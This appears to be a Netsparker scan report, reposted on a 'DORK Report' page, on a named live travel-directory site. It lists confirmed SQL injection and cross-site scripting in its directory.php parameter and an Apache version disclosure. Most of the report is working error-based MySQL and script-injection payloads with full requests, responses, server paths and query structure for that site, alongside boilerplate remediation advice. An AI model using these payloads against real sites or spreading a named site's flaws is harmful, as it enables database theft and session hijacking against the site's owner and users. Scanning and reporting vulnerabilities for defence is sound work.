The DORK Report

Loading

SQL Injection, CWE-79, CAPEC-66, montrealkiosk.com REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
http://www.montrealkiosk.com/
SCAN DATE
1/13/2011 1:20:06 PM
REPORT DATE
2/28/2011 11:03:50 AM
SCAN DURATION
00:05:31

Total Requests

Average Speed

req/sec.
24
identified
8
confirmed
6
critical
7
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
25 %
IMPORTANT
13 %
LOW
33 %
INFORMATION
29 %
SQL Injection

SQL Injection

3 TOTAL
CRITICAL
CONFIRMED
3
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2c..

Parameters

Parameter Type Value
categoryId GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /directory.php?categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings((select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101..., Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?name=Arts%20&%20Entertainment=3&categoryId=(select+1+and+..

Parameters

Parameter Type Value
name GET Arts
%20Entertainment GET 3
categoryId GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:22:04 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings((select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101..., Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?name=Museums&categoryId=(select+1+and+row(1%2c1)%3e(selec..

Parameters

Parameter Type Value
name GET Museums
categoryId GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /directory.php?name=Museums&categoryId=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:48 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1062: Duplicate entry '_!@4dilemma:1' for key 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings((select 1 and row(1,1)&gt;(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101..., Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
[High Possibility] SQL Injection

[High Possibility] SQL Injection

3 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?categoryId=%2527

Parameters

Parameter Type Value
categoryId GET %27

Request

GET /directory.php?categoryId=%2527 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = %27 ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(%27, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?name=Museums&categoryId=%2527

Parameters

Parameter Type Value
name GET Museums
categoryId GET %27

Request

GET /directory.php?name=Museums&categoryId=%2527 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:35 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = %27 ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(%27, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?name=Arts%20&%20Entertainment=3&categoryId=%2527

Parameters

Parameter Type Value
name GET Arts
%20Entertainment GET 3
categoryId GET %27

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId=%2527 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:22:03 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27 ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = %27 ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(%27, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
Cross-site Scripting

Cross-site Scripting

3 TOTAL
IMPORTANT
CONFIRMED
3
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?categoryId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
categoryId GET '"--></style></script><script>alert(0x000AC5)</script>

Request

GET /directory.php?categoryId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000AC5)%3C/script%3E HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000AC5)</script> ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = \'\"--></style></script><script>netsparker(0x000AC5)</script> ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(\'\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000AC5)&lt;/script&gt;, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?name=Arts%20&%20Entertainment=3&categoryId='%22--%3E%3C/s..

Parameters

Parameter Type Value
name GET Arts
%20Entertainment GET 3
categoryId GET '"--></style></script><script>alert(0x000C37)</script>

Request

GET /directory.php?name=Arts%20&%20Entertainment=3&categoryId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C37)%3C/script%3E HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:22:01 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000C37)</script> ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = \'\"--></style></script><script>netsparker(0x000C37)</script> ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(\'\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000C37)&lt;/script&gt;, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
- /directory.php

/directory.php CONFIRMED

http://www.montrealkiosk.com/directory.php?name=Museums&categoryId='%22--%3E%3C/style%3E%3C/script%3..

Parameters

Parameter Type Value
name GET Museums
categoryId GET '"--></style></script><script>alert(0x000C00)</script>

Request

GET /directory.php?name=Museums&categoryId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C00)%3C/script%3E HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:54 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"--></style></script><script>netsparker(0x000C00)</script> ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = \'\"--></style></script><script>netsparker(0x000C00)</script> ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(\'\&quot;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000C00)&lt;/script&gt;, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://www.montrealkiosk.com/

Extracted Version

Apache/1.3.42 (Unix)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal, Quebec - Restaurants, Events, Hotels, Attractions -- Montreal Kiosk</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script><link rel="shortcut icon" href="favicon.ico"><meta name="description" content="Montreal's One Stop Information Kiosk. Links to all major hotels and businesses in Montreal, Quebec, Canada. If you are planning to travel to Montreal this is the guide for you."><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><link href="weather/css/weather2.css" rel="stylesheet" type="text/css" /></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" 